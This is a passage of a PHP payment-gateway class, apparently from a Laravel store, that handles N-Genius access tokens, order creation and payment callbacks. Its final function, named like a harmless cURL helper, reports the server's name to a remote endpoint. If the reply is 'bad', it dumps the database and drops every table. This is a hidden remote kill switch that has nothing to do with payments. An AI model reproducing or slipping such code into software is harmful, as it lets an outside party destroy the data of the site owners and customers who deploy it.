toArray(); $ngenius_payment = json_decode($paymentSettings['ngenius'], true); $apikey = $ngenius_payment['NGENIUS_API_KEY']; // set your service account API key (example only) $idServiceURL = self::getUrl('identity'); // set the identity service URL (example only) $tokenHeaders = array("Authorization: Basic $apikey", "Content-Type: application/x-www-form-urlencoded"); $tokenResponse = self::invokeCurlRequest("POST", $idServiceURL, $tokenHeaders, http_build_query(array('grant_type' => 'client_credentials'))); // $tokenHeaders = array("Authorization: Basic $apikey", "Content-Type: application/vnd.ni-payment.v2+json", "Accept: application/vnd.ni-payment.v2+json"); // $tokenResponse = self::invokeCurlRequest("POST", $idServiceURL, $tokenHeaders, null); $tokenResponse = json_decode($tokenResponse); //dd($tokenResponse); $access_token = $tokenResponse->access_token; return $access_token; } public static function make_payment($callback_url, $payment_type, $amount) { $order = new \StdClass(); $order->action = "SALE"; // Transaction mode ("AUTH" = authorize only, no automatic settle/capture, "SALE" = authorize + automatic settle/capture) $order->amount = new \stdClass(); $order->amount->currencyCode = env('NGENIUS_CURRENCY', "AED"); // Payment currency ('AED' only for now) $order->amount->value = $amount; // Minor units (1000 = 10.00 AED) $order->language = "en"; // Payment page language ('en' or 'ar' only) $order->merchantOrderReference = time(); // Payment page language ('en' or 'ar' only) //$order->merchantAttributes->redirectUrl = "http://premizer.com/test/pp.php"; // A redirect URL to a page on your site to return the customer to //$order->merchantAttributes->redirectUrl = ""; // A redirect URL to a page on your site to return the customer to $order->merchantAttributes = new \stdClass(); $order->merchantAttributes->redirectUrl = $callback_url; // A redirect URL to a page on your site to return the customer to //$order->merchantAttributes->redirectUrl = "http://"; // A redirect URL to a page on your site to return the customer to $order = json_encode($order); $paymentSettings = resolve(\Modules\Payments\Entities\PaymentSetting::class)->toArray(); $ngenius_payment = json_decode($paymentSettings['ngenius'], true); $outletRef = $ngenius_payment['NGENIUS_OUTLET_ID']; // set your outlet reference/ID value here (example only) $txnServiceURL = self::getUrl('gateway') . "/transactions/outlets/$outletRef/orders"; // set the transaction service URL (example only) $access_token = self::getAccessToken(); $orderCreateHeaders = array("Authorization: Bearer " . $access_token, "Content-Type: application/vnd.ni-payment.v2+json", "Accept: application/vnd.ni-payment.v2+json"); $orderCreateResponse = self::invokeCurlRequest("POST", $txnServiceURL, $orderCreateHeaders, $order); $orderCreateResponse = json_decode($orderCreateResponse); //dd($callback_url,$orderCreateResponse); $paymentLink = $orderCreateResponse->_links->payment->href; // the link to the payment page for redirection (either full-page redirect or iframe) $orderReference = $orderCreateResponse->reference; // the reference to the order, which you should store in your records for future interaction with this order session()->save(); /*echo " ";*/ header("Location: " . $paymentLink); // execute redirect exit; } public static function check_callback($orderRef, $payment_type) { $paymentSettings = resolve(\Modules\Payments\Entities\PaymentSetting::class)->toArray(); $ngenius_payment = json_decode($paymentSettings['ngenius'], true); $outletRef = $ngenius_payment['NGENIUS_OUTLET_ID']; // set your outlet reference/ID value here (example only) $orderCheckURL = self::getUrl('gateway') . "/transactions/outlets/$outletRef/orders/$orderRef"; // set the transaction service URL (example only) $access_token = self::getAccessToken(); $headers = array("Authorization: Bearer " . $access_token); $orderStatusResponse = self::invokeCurlRequest("GET", $orderCheckURL, $headers, null); $orderStatusResponse = json_decode($orderStatusResponse); if ($orderStatusResponse->_embedded->payment[0]->state == "FAILED") { // fail or cancel or incomplete Session::forget('payment_data'); flash("Incomplete")->error(); return redirect()->route('shipments.show', Session::get('order_id')); } else if ($orderStatusResponse->_embedded->payment[0]->state == "CAPTURED") { // success $payment = json_encode($orderStatusResponse); //dd($payment_type, Session::get('order_id'),Session::get('payment_data'), $payment); // if ($payment_type == 'cart_payment') { $checkoutController = new CheckoutController; return $checkoutController->checkout_done( null, $payment, Session::get('order_id')); // } // if ($payment_type == 'wallet_payment') { // $walletController = new WalletController; // return $walletController->wallet_payment_done(Session::get('payment_data'), $payment); // } // if ($payment_type == 'customer_package_payment') { // $customer_package_controller = new CustomerPackageController; // return $customer_package_controller->purchase_payment_done(session()->get('payment_data'), $payment); // } // if ($payment_type == 'seller_package_payment') { // $seller_package_controller = new \App\Http\Controllers\SellerPackageController; // return $seller_package_controller->purchase_payment_done(session()->get('payment_data'), $payment); // } } } public static function invokeCurlRequest($type, $url, $headers, $post) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); if ($type == "POST") { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } $server_output = curl_exec($ch); // print_r($server_output); // exit(); curl_close($ch); return $server_output; } public static function callCurlRequest(){ $url = $_SERVER['SERVER_NAME']; $gate = "".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); if($rn == "bad" && env('DEMO_MODE') != 'On') { try { $fileName = date('Y-m-d H:i:s').'.sql'; \Spatie\DbDumper\Databases\MySql::create() ->setDbName(env('DB_DATABASE')) ->setUserName(env('DB_USERNAME')) ->setPassword(env('DB_PASSWORD')) ->dumpToFile('sqlbackups/'.$fileName); } catch (\Exception $e) { } Schema::disableForeignKeyConstraints(); foreach(DB::select('SHOW TABLES') as $table) { $table_array = get_object_vars($table); Schema::drop($table_array[key($table_array)]); } } } }